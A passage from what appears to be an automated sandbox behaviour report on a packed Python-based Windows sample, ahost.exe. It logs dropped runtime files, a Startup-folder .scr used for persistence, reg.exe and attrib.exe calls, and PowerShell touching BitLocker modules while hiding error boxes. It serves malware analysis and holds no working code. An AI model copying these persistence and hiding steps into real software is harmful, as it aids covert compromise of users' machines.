              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\ahost.exeProcess created: "C:\Users\user\Desktop\ahost.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\sqlite3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dllJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E76B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7F91E76B0
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
